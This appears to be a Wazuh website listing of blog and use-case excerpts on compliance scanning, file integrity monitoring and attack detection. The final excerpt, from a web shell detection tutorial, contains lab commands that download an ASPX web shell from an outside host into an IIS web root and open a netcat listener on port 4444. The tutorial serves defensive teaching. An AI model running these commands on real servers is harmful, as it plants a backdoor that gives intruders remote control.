Blog / Engineering / Scanning Docker infrastructure against CIS Benchmark with Wazuh
...audit daemon using the command "systemctl restart auditd"." compliance: - cis: ["1.1.12"] condition: any rules: - 'not f:/etc/containerd/config.toml' - 'c:sh -c "command -v auditctl > /dev/null && auditctl -l ||...
Use cases / Regulatory Compliance
...help monitor compliance status, identify improvement areas, and take appropriate remediation actions. See our SCA documentation for more information. Streamline compliance activities Use Wazuh XDR and SIEM capabilities to streamline compliance activities....
Use cases / Security Configuration Assessment
...It performs regular checks on monitored endpoints, ensuring compliance with PCI-DSS, HIPAA, NIST, TSC, CIS, and other relevant standards. Additionally, the Wazuh SCA enables system administrators to verify compliance with...
Blog / Engineering / Integrating Cisco Secure Endpoint with Wazuh
...Conclusion Our integration of Cisco Secure Endpoint and Wazuh...
Use cases / IT Hygiene
...and application misconfigurations. Regulatory compliance Streamline the process of adhering to compliance requirements by actively auditing your infrastructure. Wazuh performs compliance checks on monitored endpoints against specific regulatory requirements such...
Use cases / Log Data Analysis
...overview Gain complete visibility across your IT infrastructure with Wazuh. Wazuh provides complete visibility of an entire IT infrastructure by performing real-time analysis of logs from network devices, endpoints, and...
Blog / Engineering / Ensuring NIS2 compliance with Wazuh
...that monitors changes on the /root and /var/www/html/ directories while ignoring changes within /var/www/html/tmp directory: <syscheck> <directories check_all="yes" report_changes="yes" realtime="yes">/root</directories> <directories check_all="yes" realtime="yes">/var/www/html</directories> <ignore>/var/www/html/tmp</ignore> </syscheck> Where: <syscheck> is the root...
First, let's talk about CIS (Center for Internet Security), a non-profit organization founded in 2000…
Blog / Engineering / Detecting Metasploit attacks
...https://www.cvedetails.com/cve/CVE-2018-7600/ - https://nvd.nist.gov/vuln/detail/CVE-2018-7600 - https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2 condition: none rules: - 'c:find /var/www/ -type f -wholename *modules/help/help.inf* -exec grep -P version {} + -> r:^version && r:\p6.\d+' - 'c:find /var/www/ -type f...
Blog / Engineering / How can Wazuh help secure your environment?
...policy and compliance monitoring: OpenSCAP and CIS-CAT. Rootcheck allows defining policies to check if the agents meet the requirements specified. OpenSCAP is an integration that allows you to verify compliance with your security policies, performs vulnerability...
Blog / Engineering / How to detect Active Directory attacks with Wazuh [Part 1 of 2]
...has the client as Client: FakeUser @ wazuhtest.com. Current LogonId is 0:0x186c51 Cached Tickets: (1) #0> Client: FakeUser @ wazuhtest.com Server: krbtgt/wazuhtest.com @ wazuhtest.com KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags...
Blog / Engineering / Web shell attack detection with Wazuh
...commands: > Invoke-WebRequest -OutFile 'C:\Users\Public\Downloads\webshell.aspx' -Uri https://privdayz.com/cdn/txt/aspx.txt > copy 'C:\Users\Public\Downloads\webshell.aspx' 'C:\inetpub\wwwroot\webshell-script.aspx' Parrot OS endpoint 1. On the Parrot OS endpoint, listen on port 4444 using the following command: $ nc...